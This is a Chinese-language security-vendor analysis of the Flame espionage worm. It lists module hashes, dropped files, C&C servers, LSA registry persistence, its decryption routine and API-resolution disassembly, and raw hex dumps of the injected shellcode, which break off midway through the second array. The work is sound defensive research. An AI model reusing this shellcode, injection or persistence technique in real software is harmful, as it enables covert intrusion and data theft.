[ English ]
[ English ]
安天安全研究与应急处理中心(Antiy CERT)
首次发布时间:2012年5月31日
本版本更新时间:2012年8月17日
在我们工作的经历中还从没出现过这样的情况,一个分析小团队接近一个月的时间里,只面对一个恶意代码,并且还计划把工作继续下去,尽管在Stuxnet蠕虫中,我们尝试这样做过,但小组只工作了不到10天的时间,便浅尝辄止了。我们自陆续对Stuxnet、Duqu和Flame进行分析以来,我们逐渐的发现作为传统的AVER,在面对挑战和变革时传统的方法必须被打破。
传统的恶意代码主要目的为感染更多的计算机,后期演化成利益链条,所以其开发简单直接,功能明确,他们往往采用单体的文件,尽量减小体积以利于可靠传播,因此对其进行分析也相对容易。从另一个意义上说,地下经济虽然催生了类似Trojan、Bot等的爆发,但并没有影响到攻守双方的平衡,反病毒团队依托捕获体系和后端的自动化分析平台,几乎所有的反病毒厂商都能在很少的人工分析的工作支持下,应对海量的恶意代码。甚至仅凭自动化系统,在无人值守的情况下,新的检测规则同样可以从新的样本被提取出来,并分发给反病毒产品。因此我们滋长了惰性,过多的依赖沙箱和其他的自动化环节,甚至我们一度以为病毒分析工程师的使命正在被淡化和消亡。
而今天在面对Stuxnet、Flame等病毒时,一切不同了,用户更多询问我们的不是“如何发现、你的产品能不能杀掉”,而是“他到底干了什么?”、“我如何避免今后类似的攻击?”这些都让我们必须从分析流水线的操纵者,重新变回贴身肉搏的战士,我们需要回到短兵相接的现场勘察、环境复现和深入细腻的后端分析中。
Flame的文件数量和总体大小都是令人震撼的,与之前我们看到的APT场景下的恶意代码一样,类似样本采用模块化,框架化开发,结构复杂,文件较多,但Flame几乎达到了难以想象的程度。其模块分工亦导致了其隐蔽性较好,躲避杀软的能力较高。并且内部封装了各种加密模块来隐藏重要信息。这些体积庞大结构复杂的恶意代码在APT攻击中扮演着精密的任务,其对环境特征的监察非常准确,如果发现环境信息不符合其感染的目的则直接退出,并完全清除痕迹,这种样本不会大规模爆发,依托大量配置信息和远程调度完成工作,在被发现时一般目的已经达成。我们习惯性的分析单体病毒样本,依托自动化分析结果和少量的反汇编,包括那些在分析报告之前,加一个带有HASH值的样本标签的习惯工作思路,应对这种复杂的局面时,都显得那样的幼稚和过时。
因此面对这么多的样本和衍生文件,我们最终选择了蚂蚁搬家的方法,小组每人分工分析不同的模块,并把分析结果随手记录下来,我们不指望最终有一篇巨大的研究报告,而是能把这些点滴集合起来,为应对这种攻击提供一些研究基础。小组内有两条线路,一是主模块分析,主模块文件体积有6MB多,分析时投入的时间较多。主要对其加密算法、字符串信息、整体结构等方面进行分析。二是其它模块功能分析,在分析模块功能时发现部分模块具有相同的功能如:收集信息、遍历进程、屏幕窃取等。在分析过程中我们还在内存中发现很多有意思的信息,但我们依然陷于“猜谜”之中。
我们在后续会继续我们的工作,并力图把更多结果,更新到这份报告之上。在一段时间内,能够持续去做一件有意义的事,是幸福的,特别是与伙伴在一起做的时候。
安天实验室安全研究与应急处理中心
Pluck、Sky、White、Pillcor
2012.07.31
安天实验室于2012年5 月28 日起陆续捕获到Flame蠕虫的样本,截止到目前安天已经累计捕获Flame蠕虫主文件的变种数6个,其它模块为20多个不同HASH值的样本实体,并通过这些样本进一步生成了其他的衍生文件。安天成立了专门的分析小组,经过持续分析,发现它是采用多模块化复杂结构实现的信息窃取类型的恶意软件。其主模块文件大小超过6MB。包含了大量加密数据、内嵌开源软件代码(如Lua等)、漏洞攻击代码、模块配置文件、多种加密压缩算法,信息盗取等多种模块。在漏洞攻击模块中发现了Stuxnet使用过的USB攻击模块,Stuxnet事件是发生在2010年针对伊朗核设施的APT攻击事件[1]。
据外界现有分析,该恶意软件已经非常谨慎地运作了至少两年时间[2],它不但能够窃取文件,对用户系统进行截屏,通过USB传播禁用安全厂商的安全产品,并可以在一定条件下传播到其他系统,还有可能利用微软Windows系统的已知或已修补的漏洞发动攻击,进而在某个网络中大肆传播。
目前业内各厂商对该蠕虫的评价如下:McAfee认为此威胁是Stuxnet和Duqu攻击的继续[3];卡巴斯基实验室则认为Flame攻击是目前发现的最为复杂的攻击之一[4],它是一种后门木马并具有蠕虫的特征。赛门铁克认为,Flame与之前两种威胁Stuxnet和Duqu一样,其代码非一人所为,而是由一个有组织、有资金支持并有明确方向性的网络犯罪团体所编写。
表 2-1现有Flame蠕虫PE文件与功能一览表
文件名
|
文件MD5与大小
|
功能
|
mssecmgr.ocx
|
b51424138d72d343f22d03438fc9ced5 (1,236,992字节)
0a17040c18a6646d485bde9ce899789f (6,172,160字节)
ee4b589a7b5d56ada10d9a15f81dada9 (892,417字节)
e5a49547191e16b0a69f633e16b96560 (6,166,528字节)
bdc9e04388bda8527b398a8c34667e18
(1,236,992字节)
37c97c908706969b2e3addf70b68dc13 (391,168 字节)
|
主模块运行后会将其资源文件中的多个功能模块解密释放出来,并将它们注入到多个系统 进程中。它通过调用Lua来执行脚本完成指定功能。
|
advnetcfg.ocx
|
f0a654f7c485ae195ccf81a72fe083a2 (643,072 字节)
8ed3846d189c51c6a0d69bdc4e66c1a5 (421,888 字节)
bb5441af1e1741fca600e9c433cb1550 (643,944 字节)
|
由主模块释放:截取屏幕信息。
|
msglu32.ocx
|
d53b39fb50841ff163f6e9cfd8b52c2e (1,721,856 字节)
2512321f27a05344867f381f632277d8 (1,729,536 字节)
|
由主模块释放:遍历系统中的各种类型的文件,读取特定文件类型文件的信息,将其写入到SQL数据库中,同时也可以收集文件中与地域性相关的一些信息。
|
nteps32.ocx
|
c9e00c9d94d1a790d5923b050b0bd741
(827,392 字节)
e66e6dd6c41ece3566f759f7b4ebfa2d (602,112 字节)
5ecad23b3ae7365a25b11d4d608adffd (827,392 字节)
|
由主模块释放:用来键盘记录和截取屏幕信息。对一些邮件域名进行监控。
|
rpcns4.ocx
(soapr32.ocx)
|
296e04abb00ea5f18ba021c34e486746 (160,768 字节)
1f9f0baa3ab56d72daab024936fdcaf3 (188,416 字节)
cc54006c114d51ec47c173baea51213d (253,952 字节)
e6cb7c89a0cae27defa0fd06952791b2 (349,596 字节)
|
用来收集信息的功能模块。获取系统中的一些信息,例如:安装的软件信息、网络信息、无线网络信息、USB信息、时间以及时区信息等。
|
comspol32.ocx
|
20732c97ef66dd97389e219fc0182cb5 (634,880 字节)
|
分析中。
|
00004784.dll
(jimmy.dll)
|
ec992e35e794947a17804451f2a8857e (483,328 字节)
|
是用来收集用户计算机信息,包括窗体标题、注册表相关键值信息、计算机名,磁盘类型等。
|
wusetupv.exe
|
1f61d280067e2564999cac20e386041c (29,928 字节)
|
收集本机各个接口的信息、进程信息,注册表键值信息等。
|
DSMGR.DLL
(browse32.ocx)
|
2afaab2840e4ba6af0e5fa744cd8f41f (116,224 字节)
7d49d4a9d7f0954a970d02e5e1d85b6b(458,869 字节)
|
用来删除恶意软件所有痕迹,防止取证分析。
|
boot32drv.sys(00004069.exe)
|
06a84ad28bbc9365eb9e08c697555154(49,152 字节)
|
它是一个加密数据文件并不是PE文件,加密方式是通过与0xFF做xor操作。
|
表 2-2Flame蠕虫所有衍生文件和其它文件列表
Ef_trace.log
|
dstrlog.dat
|
mscorest.dat
|
soapr32.ocx
|
winrt32.dll
|
GRb9M2.bat
|
dstrlogh.dat
|
mscrypt.dat
|
srcache.dat
|
winrt32.ocx
|
Lncache.dat
|
fmpidx.bin
|
msglu32.ocx
|
sstab.dat
|
wpab32.bat
|
Temp~mso2a0.tmp
|
indsvc32.dll
|
mspovst.dat
|
sstab0.dat
|
wpgfilter.dat
|
Temp~mso2a1.tmp
|
indsvc32.ocx
|
mssui.drv
|
sstab1.dat
|
~8C5FF6C.tmp
|
Temp~mso2a2.tmp
|
lmcache.dat
|
mssvc32.ocx
|
sstab10.dat
|
~DF05AC8.tmp
|
advnetcfg.ocx
|
ltcache.dat
|
nt2cache.dat
|
sstab11.dat
|
~DFD85D3.tmp
|
advpck.dat
|
m3aaux.dat
|
ntaps.dat
|
sstab12.dat
|
~DFL543.tmp
|
audfilter.dat
|
m3afilter.dat
|
ntcache.dat
|
sstab15.dat
|
~DFL544.tmp
|
authcfg.dat
|
m3asound.dat
|
nteps32.ocx
|
sstab2.dat
|
~DFL546.tmp
|
authpack.ocx
|
m4aaux.dat
|
pcldrvx.ocx
|
sstab3.dat
|
~HLV084.tmp
|
boot32drv.sys
|
m4afilter.dat
|
posttab.bin
|
sstab4.dat
|
~HLV294.tmp
|
ccalc32.sys
|
m4asound.dat
|
qpgaaux.dat
|
sstab5.dat
|
~HLV473.tmp
|
commgr32.dll
|
m5aaux.dat
|
rccache.dat
|
sstab6.dat
|
~HLV751.tmp
|
comspol32.dll
|
m5afilter.dat
|
rpcnc.dat
|
sstab7.dat
|
~HLV927.tmp
|
comspol32.ocx
|
m5asound.dat
|
scaud32.exe
|
sstab8.dat
|
~KWI988.tmp
|
ctrllist.dat
|
mixercfg.dat
|
scsec32.exe
|
sstab9.dat
|
~KWI989.tmp
|
dmmsap.dat
|
mixerdef.dat
|
sdclt32.exe
|
syscache.dat
|
~TFL848.tmp
|
domm.dat
|
mlcache.dat
|
secindex.dat
|
syscache3.dat
|
~TFL849.tmp
|
domm2.dat
|
modevga.com
|
sndmix.drv
|
watchxb.sys
|
~ZFF042.tmp
|
domm3.dat
|
mpgaaux.dat
|
mscorest.dat
|
wavesup3.drv
|
~a28.tmp
|
dommt.dat
|
mpgaud.dat
|
mscrypt.dat
|
winconf32.ocx
|
~a38.tmp
|
~dra51.tmp
|
~dra52.tmp
|
~dra53.tmp
|
~dra61.tmp
|
~rei524.tmp
|
~rei525.tmp
|
~rf288.tmp
|
|
|
|
蠕虫主模块是一个文件名为mssecmgr.ocx的DLL文件,我们发现该模块已有多个衍生版本,文件大小为6M,运行后会连接C&C服务器,并试图下载或更新其它模块。主模块不同时期在被感染的机器上文件名有不同,但扩展名都为“OCX”。运行后的主模块会将其资源文件中的多个功能模块解密释放出来,并将多个功能模块注入到多个进程中,功能模块具有获取进程信息、键盘信息、硬件信息、屏幕信息、麦克风、存储设备、网络、WIFI、蓝牙、USB等多种信息的功能。所记录的信息文件存放在%Windir%\temp\下。该蠕虫会先对被感染系统进行勘察,如果不是其想要的攻击对象,它将会自动从被感染系统卸载掉。蠕虫最有可能是通过欺骗微软升级服务器对本地网络传播和通过一个USB接入设备进行传播。蠕虫还能够发现有关其周边设备的信息。通过蓝牙装置,它会寻找其它设备,比如手机或笔记本电脑等。此蠕虫和以往蠕虫有很大程度上的不同,首先主模块体积很大,并包含多个功能模块,内嵌Lua解释器和大量Lua脚本,进行高层的功能扩展。启动方式比较特殊,具有多种压缩和加密方式。
本地行为注:该键值会达到开机加载mssecmgr.ocx的目的。该文件路径为:%system32%\mssecmgr.ocx。
通过对“146”资源进行释放并加载运行,以下为资源释放的模块:
文件
|
MD5
|
%System32%\advnetcfg.ocx
|
BB5441AF1E1741FCA600E9C433CB1550
|
%System32%\boot32drv.sys
|
C81D037B723ADC43E3EE17B1EEE9D6CC
|
%System32%\msglu32.ocx
|
D53B39FB50841FF163F6E9CFD8B52C2E
|
%Syste32m%\nteps32.ocx
|
C9E00C9D94D1A790D5923B050B0BD741
|
%Syste32m%\soapr32.ocx
|
296E04ABB00EA5F18BA021C34E486746
|
%Syste32m%\ccalc32.sys
|
5AD73D2E4E33BB84155EE4B35FBEFC2B
|
其它文件:
在%ProgramFiles%\Common Files\Microsoft Shared\MSAudio目录下为各模块的配置信息和自身副本文件,从网络中更新或下载新模块配置也会在这里,列表如下:
在分析过程中发现以上文件可能为病毒的配置文件,当病毒要进行一个操作前先读取此文件中的一块信息,然后完成其指定的操作。病毒先将以上文件释放然后删除一次,最后又重新释放,推测为不同功能之间的重复操作导致。
根据“146”资源配置还可能会存在以下文件目录:
关于遍历安全进程列表内容参见附录一(详见附录一:为Mssecmgr.ocx文件中的遍历安全进程列表,其列表和其它模块中的一些遍历进程列表中一些进程是相同的。)
访问地址1:http://windowsuate.microsoft.com/
访问地址2:http://windowsupdate.microsoft.com/windowsupdate/v6/default.aspx
协议:Http
端口:80
访问地址:91.135.66.118[traffic-spot.com][traffic-spot.biz][smart-access.net][quick-net.info]
协议:Https
端口:443
病毒运行后,首先访问Windows系统升级服务器地址,然后对IP地址为91.135.66.118的四个域名进行访问,并回传数据。
图 3-1 Post数据
连接所有的域名信息参加附录二(附录二:连接所有域名列表)。
样本文件启动加载顺序
图 3-2文件启动加载顺序
该病毒的加载方式有两种,一种是在注册表中添加键值,另一种是利用批处理文件来执行DOS命令运行Rundll32.exe加载主模块运行。
首先查询注册表HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\SeCEdit和查看%Program Files%\Common Files\Microsoft Shared\MSAudio\wavesup3.drv文件是否存在。写入HKLM\System\CurrentControlSet\Control\TimeZoneInformation\StandardSize值为:114。
创建MSSecurityMgr目录,写入文件Mscrypt.dat,在查询信息文件时每查询后会把更改时间写成1601-1-1 08:00:00,经过1分钟后写入Wpgfilter.dat文件在查询信息文件时每查询后会把更改时间写成1601-1-1 08:00:00,经过1分钟左右后写入Wavesup3.drv文件查询后会把更改时间写成1601-1-1 08:00:00,写入文件Wavesup3.drv后会写入Audcache文件接着写入Audfilter.dat文件。然后查找以下文件:
然后注入进程Services.exe调用系统文件Shell32.dll文件,并劫持Shell32.dll内容,把Wpgfilter.dat的内容加载到Shell32.dll中,再加载Audcache文件内容到Shell32.dll中。再加载Wavesup3.drv文件,然后释放Neps32.exe文件、Comspol32.ocx、Advnetcfg.ocx、Boot32drv.sys、Msglu32.ocx,并将它们的时间改为Kernel32.dll文件的时间,为了躲避安全软件的检测。
然后注入到Winlogon.exe进程中调用系统文件Shell32.dll文件,并劫持Shell32.dll内容,把Netps32.ocx和Ccalc32.sys的内容加载到Shell32.dll中。并将它们的时间改为Kernel32.dll文件的时间,为了躲避安全软件的检测。
通过注入Explore.exe进程调用系统文件Shell32.dll文件,并劫持Shell32.dll内容,并使其创建Iexplore.exe进程,把Wpgfilter.dat的内容加载到Shell32.dll中,然后再加载Audcache文件内容到Shell32.dll中。几分钟后加载Wavesup3.drv文件。查询注册表系统服务项,连接微软升级服务器,然后再连接病毒服务器。
程序中大量数据被加密。加密算法代码位置如下:
0x1000E3F5 proc near
test edx, edx
push esi
mov esi, eax
jbe short 0x1000E42F
push ebx
push edi
push 0Bh
pop edi
sub edi, esi
0x1000E403:
lea ecx, [edi+esi]
lea eax, [ecx+0Ch]
imul eax, ecx
add eax, dword_10376F70
mov ecx, eax
shr ecx, 18h
mov ebx, eax
shr ebx, 10h
xor cl, bl
mov ebx, eax
shr ebx, 8
xor cl, bl
xor cl, al
sub [esi], cl
inc esi
dec edx
jnz short 0x1000E403
pop edi
pop ebx
0x1000E42F:
pop esi
retn
0x1000E3F5 endp
对该函数的调用有2个函数。分别位置如下:
1000E451 movzx edx, word ptr [ebx+9]
1000E455 lea eax, [ebx+0Bh]
1000E458 mov [ebp+8], eax
1000E45B call 0x1000E3F5
1000E498 movzx edx, word ptr [esi+12h]
1000E49C lea ebx, [esi+14h]
1000E49F mov eax, ebx
1000E4A1 call 0x1000E3F5
解密算法说明:
函数有两个参数:edx [解密字符串长度],eax[解密字符串的起始地址]
返回值:eax[解密后字符串的起始地址]
解密算法:
ECX=(0xBh+n)*(0xBh+0xCh+n)+[0x10376F70h]
注意:n是要解密的字符距起始字符的距离.
CL=(M1)xor(M2)xor(M3)xor(M4)
解密数据 = 加密数据 – CL
第一次调用:
函数有一个参数:arg.1[地址]
解密字符串长度:[word]arg.1+0x9h
解密字符串起始地址:[dword]arg.1+0xBh
返回值: 解密后字符串的起始地址
第二次调用:
函数有一个参数:arg.1[address]
解密字符串长度: [word]arg.1+0x12h
解密字符串起始地址: [dword]arg.1+0x14h
返回值: 解密后字符串的起始地址
对该病毒的调试过程中发现其将所有的指针通过函数EncodePointer进行编码后存储到内部结构中(这也与Duqu的实现方式类似),当使用时再调用DecodePointer解码使用,这样做会使对其静态分析变得极其困难。这个病毒使用了通过获取系统dll文件的导出函数表并循环查找指定函数的方法来动态获取函数地址,此方法是恶意代码的惯用手段,详见代码。
mov eax, [ebp-4]
mov eax, [esi+eax*4] //export func name offset
add eax, [ebp+module_handle]
push [ebp+func_name_size]
mov [ebp+export_func_name], eax
push eax
call IsBadReadPtr
test eax, eax
jnz 0x1000BE19
push [ebp+func_name]
push [ebp+export_func_name]
call lstrcmpiA
test eax, eax
jz short 0x1000BE2B
图 3-3动态获取指定Dll文件中的函数
该恶意代码在系统路径%ProgramFiles%\Common Files\Microsoft Shared下创建MSSecurityMgr文件夹,并将一些配置文件保存到此目录中。恶意代码会在进程环境变量中保存系统关键目录(WINDOWS目录、SYSTEM32目录、系统临时目录)和自身程序的文件路径。并通过文件查找的API函数来寻找Kernel32.dll文件,并将恶意代码所创建的文件或文件夹的时间设置为与Kernel32.dll文件相同。起到隐藏痕迹的目的。
该恶意代码先将自身复制为%System32%\mssecmgr.ocx。再通过修改注册表达到启动目的,修改的注册表键值为:
“HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Lsa”
下的“Authentication Packages”。将其值中追加病毒的模块名如图5。此注册表键值的作用是列出了用户身份验证程序包,当用户登录到系统时加载并调用[5]。从而达到开机启动的目的。
图 3-4修改的注册表键值
病毒通过遍历进程来查找Explorer.exe进程并通过WriteProcessMemory将Shell Code写入到Explorer.exe进程中。并且通过CreateRemoteTheread 函数创建远程线程执行ShellCode。
调试发现加密数据,并将其释放到指定目录下。
C:\Program Files\Common Files\Microsoft Shared\MSSecurityMgr\mscrypt.dat
此模块中的数据应为配置数据
分析程序的进程操作行为
程序利用OpenProcess打开services.exe进程,句柄为0x174
通过函数WriteProcessMemory向Services.exe进程写入Shellcode,这也是恶意代码的惯用手法,存在明显恶意行为的代码注入到系统进程中执行,以躲避杀软查杀。
Sehll Code内容,长度为0x82
0x55,0x8B,0xEC,0x51,0x53,0x56,0x57,0x33,0xFF,0x89,0x7D,0xFC,0xE8,0x00,0x00,0x00,
0x00,0x58,0x89,0x45,0xFC,0x8B,0x45,0xFC,0x6A,0x64,0x59,0x48,0x49,0x89,0x45,0xFC,
0x74,0x5B,0x81,0x38,0xBA,0xBA,0x0D,0xF0,0x75,0xF1,0x8D,0x70,0x04,0x8B,0x0E,0x6A,
0xFF,0xFF,0x31,0x8B,0xD8,0xFF,0x50,0x08,0x85,0xC0,0x75,0x2C,0x8B,0x06,0x83,0x7C,
0x07,0x0C,0x00,0x74,0x0E,0xFF,0x75,0x10,0x03,0xC7,0xFF,0x75,0x0C,0xFF,0x70,0x08,
0xFF,0x50,0x0C,0x81,0xC7,0x20,0x02,0x00,0x00,0x81,0xFF,0x00,0x55,0x00,0x00,0x72,
0xDB,0x8B,0x06,0xFF,0x30,0xFF,0x53,0x0C,0xFF,0x75,0x10,0x8B,0x06,0xFF,0x75,0x0C,
0xFF,0x75,0x08,0xFF,0x50,0x04,0x5F,0x5E,0x5B,0xC9,0xC2,0x0C,0x00,0x33,0xC0,0x40,
0xEB,0xF4
第二段Shell Code会被后面创建的远程线程直接执行。
ShellCode内容,长度为0x70c
0x55,0x8B,0xEC,0x83,0xEC,0x70,0x53,0x33,0xDB,0x56,0x8B,0x75,0x08,0x57,0x33,0xC0,
0x89,0x5D,0xA8,0x8D,0x7D,0xAC,0xAB,0xAB,0x8D,0x86,0x74,0x04,0x00,0x00,0x50,0xC6,
0x45,0xFA,0x00,0x89,0x5D,0xE8,0x88,0x5D,0xFB,0x89,0x5D,0xE4,0x89,0x5D,0xEC,0x89,
0x5D,0xC8,0x89,0x5D,0xD0,0x89,0x5D,0xD4,0x89,0x5D,0xBC,0x89,0x5D,0xC4,0x89,0x5D,
0xE0,0x89,0x5D,0xDC,0xC7,0x45,0xF0,0x01,0x00,0xFF,0xFF,0x89,0x9E,0x2C,0x0B,0x00,
0x00,0xFF,0x56,0x10,0x3B,0xC3,0x89,0x45,0xC0,0x75,0x0A,0xB8,0x02,0x00,0xFF,0xFF,
0xE9,0xA0,0x06,0x00,0x00,0x8D,0x86,0x81,0x04,0x00,0x00,0x50,0xFF,0x75,0xC0,0xFF,
0x56,0x1C,0x3B,0xC3,0x75,0x0A,0xB8,0x03,0x00,0xFF,0xFF,0xE9,0x85,0x06,0x00,0x00,
0x53,0x8D,0x4D,0xDC,0x51,0x6A,0x01,0x8D,0x8E,0xB6,0x04,0x00,0x00,0x51,0xFF,0xD0,
0x85,0xC0,0x75,0x0A,0xB8,0x04,0x00,0xFF,0xFF,0xE9,0x67,0x06,0x00,0x00,0x8B,0x45,
0xDC,0x89,0x45,0xAC,0x8D,0x86,0x30,0x0B,0x00,0x00,0x8B,0x78,0x3C,0x03,0xF8,0xC7,
0x45,0xA8,0x0C,0x00,0x00,0x00,0x89,0x5D,0xB0,0x0F,0xB7,0x47,0x14,0x8D,0x44,0x38,
0x18,0x89,0x45,0xCC,0x8B,0x47,0x08,0x25,0x07,0xF8,0xFF,0xFF,0x05,0x00,0x00,0x90,
0xD6,0x3D,0x00,0x00,0x00,0x06,0x0F,0x87,0x24,0x06,0x00,0x00,0x38,0x9E,0x20,0x09,
0x00,0x00,0x8B,0x47,0x50,0x89,0x45,0x08,0x74,0x67,0x53,0x53,0x6A,0x03,0x53,0x6A,
0x01,0x68,0x00,0x00,0x00,0x80,0x8D,0x86,0x22,0x09,0x00,0x00,0x50,0xFF,0x56,0x50,
0x83,0xF8,0xFF,0x89,0x45,0xF4,0x75,0x0A,0xB8,0x06,0x00,0xFF,0xFF,0xE9,0xF3,0x05,
0x00,0x00,0x53,0xFF,0x75,0x08,0x53,0x68,0x02,0x00,0x00,0x01,0x53,0x50,0xFF,0x56,
0x28,0xFF,0x75,0xF4,0x89,0x45,0xD8,0xFF,0x56,0x4C,0x39,0x5D,0xD8,0x75,0x0A,0xB8,
0x07,0x00,0xFF,0xFF,0xE9,0xCC,0x05,0x00,0x00,0xFF,0x75,0x08,0x53,0x53,0x6A,0x04,
0xFF,0x75,0xD8,0xFF,0x56,0x30,0xFF,0x75,0xD8,0x89,0x45,0xF4,0xFF,0x56,0x4C,0xEB,
0x0F,0x6A,0x04,0x68,0x00,0x10,0x00,0x00,0x50,0x53,0xFF,0x56,0x04,0x89,0x45,0xF4,
0x39,0x5D,0xF4,0x75,0x0A,0xB8,0x08,0x00,0xFF,0xFF,0xE9,0x96,0x05,0x00,0x00,0x8D,
0x45,0xC4,0x50,0x6A,0x04,0xFF,0x75,0x08,0xFF,0x75,0xF4,0xFF,0x56,0x0C,0x85,0xC0,
0x75,0x0C,0xC7,0x45,0xF0,0x09,0x00,0xFF,0xFF,0xE9,0x8D,0x04,0x00,0x00,0xFF,0x77,
0x50,0x53,0xFF,0x75,0xF4,0xFF,0x56,0x24,0xFF,0x77,0x54,0x8D,0x86,0x30,0x0B,0x00,
0x00,0x50,0xFF,0x75,0xF4,0xFF,0x56,0x20,0x83,0xC4,0x18,0x66,0x39,0x5F,0x06,0x89,
0x5D,0x08,0x76,0x35,0x0F,0xB7,0x45,0x08,0x8B,0x4D,0xCC,0x6B,0xC0,0x28,0x03,0xC1,
0xFF,0x70,0x10,0x8B,0x50,0x14,0x8B,0x40,0x0C,0x03,0x45,0xF4,0x8D,0x8E,0x30,0x0B,
0x00,0x00,0x03,0xD1,0x52,0x50,0xFF,0x56,0x20,0x83,0xC4,0x0C,0xFF,0x45,0x08,0x66,
0x8B,0x45,0x08,0x66,0x3B,0x47,0x06,0x72,0xCB,0x8B,0x45,0xF4,0x2B,0x47,0x34,0x89,
0x45,0xB8,0x0F,0x84,0x8A,0x00,0x00,0x00,0x8B,0x87,0xA0,0x00,0x00,0x00,0x03,0x45,
0xF4,0x3B,0x45,0xF4,0x75,0x0C,0xC7,0x45,0xF0,0x0A,0x00,0xFF,0xFF,0xE9,0x09,0x04,
0x00,0x00,0x8B,0x8F,0xA4,0x00,0x00,0x00,0x03,0xC8,0x3B,0xC1,0x89,0x4D,0xB4,0x73,
0x61,0x8B,0x50,0x04,0x8B,0x08,0x03,0x4D,0xF4,0x83,0xEA,0x08,0xF7,0xC2,0xFE,0xFF,
0xFF,0xFF,0x89,0x5D,0x08,0x76,0x43,0x8B,0x55,0x08,0x0F,0xB7,0x54,0x50,0x08,0x81,
0xE2,0xFF,0x0F,0x00,0x00,0x89,0x55,0xD8,0x8B,0x55,0x08,0x0F,0xB7,0x54,0x50,0x08,
0x0F,0xB7,0xD2,0xC1,0xEA,0x0C,0x74,0x10,0x83,0xFA,0x03,0x75,0x3F,0x0F,0xB7,0x55,
0xD8,0x8B,0x5D,0xB8,0x03,0xD1,0x01,0x1A,0x8B,0x50,0x04,0xFF,0x45,0x08,0x83,0xEA,
0x08,0xD1,0xEA,0x33,0xDB,0x39,0x55,0x08,0x72,0xBD,0x03,0x40,0x04,0x3B,0x45,0xB4,
0x72,0x9F,0x8B,0x87,0x80,0x00,0x00,0x00,0x03,0x45,0xF4,0x3B,0x45,0xF4,0x75,0x18,
0xC7,0x45,0xF0,0x0C,0x00,0xFF,0xFF,0xE9,0x7F,0x03,0x00,0x00,0xC7,0x45,0xF0,0x0B,
0x00,0xFF,0xFF,0xE9,0x73,0x03,0x00,0x00,0x39,0x58,0x0C,0x0F,0x84,0x80,0x00,0x00,
0x00,0x83,0xC0,0x10,0x89,0x45,0x08,0x8B,0x45,0x08,0x83,0x38,0x00,0x74,0x70,0x83,
0x78,0xF4,0x00,0x0F,0x85,0xB9,0x00,0x00,0x00,0x8B,0x58,0xFC,0x03,0x5D,0xF4,0x53,
0xFF,0x56,0x18,0x85,0xC0,0x0F,0x84,0xB0,0x00,0x00,0x00,0x53,0xFF,0x56,0x10,0x85,
0xC0,0x89,0x45,0xD8,0x0F,0x84,0xAA,0x00,0x00,0x00,0x8B,0x45,0x08,0x8B,0x18,0x03,
0x5D,0xF4,0xEB,0x29,0x8B,0x03,0x85,0xC0,0x79,0x07,0x25,0xFF,0xFF,0x00,0x00,0xEB,
0x08,0x8B,0x4D,0xF4,0x03,0xC1,0x83,0xC0,0x02,0x50,0xFF,0x75,0xD8,0xFF,0x56,0x1C,
0x85,0xC0,0x89,0x03,0x0F,0x84,0x83,0x00,0x00,0x00,0x83,0xC3,0x04,0x83,0x3B,0x00,
0x75,0xD2,0x83,0x45,0x08,0x14,0x8B,0x45,0x08,0x83,0x78,0xFC,0x00,0x75,0x88,0x33,
0xDB,0x66,0x39,0x5F,0x06,0x89,0x5D,0x08,0x0F,0x86,0xBA,0x00,0x00,0x00,0x0F,0xB7,
0x45,0x08,0x8B,0x4D,0xCC,0x6B,0xC0,0x28,0x03,0xC1,0x8B,0x48,0x24,0xF7,0xC1,0x20,
0x00,0x00,0x20,0x74,0x07,0xC7,0x45,0xC8,0x01,0x00,0x00,0x00,0x33,0xD2,0x42,0x85,
0xC9,0x79,0x03,0x89,0x55,0xD0,0xF7,0xC1,0x00,0x00,0x00,0x40,0x74,0x03,0x89,0x55,
0xD4,0x39,0x5D,0xC8,0x8B,0xCA,0x74,0x42,0x39,0x5D,0xD0,0x74,0x2E,0x6A,0x40,0x59,
0xEB,0x49,0xC7,0x45,0xF0,0x0D,0x00,0xFF,0xFF,0xEB,0x19,0xC7,0x45,0xF0,0x0E,0x00,
0xFF,0xFF,0xEB,0x10,0xC7,0x45,0xF0,0x0F,0x00,0xFF,0xFF,0xEB,0x07,0xC7,0x45,0xF0,
0x10,0x00,0xFF,0xFF,0x33,0xDB,0xE9,0x70,0x02,0x00,0x00,0x8B,0x4D,0xD4,0xF7,0xD9,
0x1B,0xC9,0x83,0xE1,0x10,0x83,0xC1,0x10,0xEB,0x11,0x39,0x5D,0xD4,0x74,0x0C,0x33,
0xC9,0x39,0x5D,0xD0,0x0F,0x95,0xC1,0x8D,0x4C,0x09,0x02,0x8B,0x50,0x08,0x8B,0x40,
0x0C,0x03,0x45,0xF4,0x89,0x55,0xB4,0x8D,0x55,0xC4,0x52,0x51,0xFF,0x75,0xB4,0x50,
0xFF,0x56,0x0C,0x85,0xC0,0x74,0x28,0xFF,0x45,0x08,0x66,0x8B,0x45,0x08,0x66,0x3B,
0x47,0x06,0x0F,0x82,0x46,0xFF,0xFF,0xFF,0x8B,0x7F,0x28,0x03,0x7D,0xF4,0x89,0x7D,
0xE0,0x75,0x18,0xC7,0x45,0xF0,0x12,0x00,0xFF,0xFF,0xE9,0x0C,0x02,0x00,0x00,0xC7,
0x45,0xF0,0x11,0x00,0xFF,0xFF,0xE9,0x00,0x02,0x00,0x00,0xFF,0xB6,0x1C,0x09,0x00,
0x00,0x33,0xFF,0x47,0x57,0xFF,0x75,0xF4,0xFF,0x55,0xE0,0x3B,0xC7,0x74,0x14,0x53,
0x53,0xFF,0x75,0xF4,0xFF,0x55,0xE0,0xC7,0x45,0xF0,0x13,0x00,0xFF,0xFF,0xE9,0xD8,
0x01,0x00,0x00,0x8D,0x86,0x6A,0x02,0x00,0x00,0x50,0x53,0x8D,0x45,0xA8,0x50,0x89,
0x7D,0xBC,0xFF,0x56,0x44,0x3B,0xC3,0x89,0x45,0xE8,0x75,0x0C,0xC7,0x45,0xF0,0x14,
0x00,0xFF,0xFF,0xE9,0xB3,0x01,0x00,0x00,0x6A,0xFF,0x50,0xFF,0x56,0x48,0x85,0xC0,
0x74,0x0C,0xC7,0x45,0xF0,0x15,0x00,0xFF,0xFF,0xE9,0x9D,0x01,0x00,0x00,0x8D,0x46,
0x60,0x50,0x53,0x68,0x1F,0x00,0x0F,0x00,0xC6,0x45,0xFB,0x01,0xFF,0x56,0x2C,0x3B,
0xC3,0x89,0x45,0xE4,0xC6,0x45,0x0B,0x00,0xBF,0x08,0x55,0x00,0x00,0x75,0x28,0x8D,
0x46,0x60,0x50,0x57,0x53,0x6A,0x04,0x8D,0x45,0xA8,0x50,0x6A,0xFF,0xC6,0x45,0x0B,
